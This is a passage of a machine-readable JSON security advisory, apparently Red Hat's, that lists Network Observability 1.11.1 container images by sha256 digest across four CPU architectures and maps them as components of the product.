"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3A7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3A2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3A30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256%3A325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774962696"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3A13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122?arch=amd64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3A5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3Adc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3A05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3A4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d?arch=arm64\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3A791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3A9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3Ab0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3Ab5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3Aa72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3A880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3Aa90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3Adc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
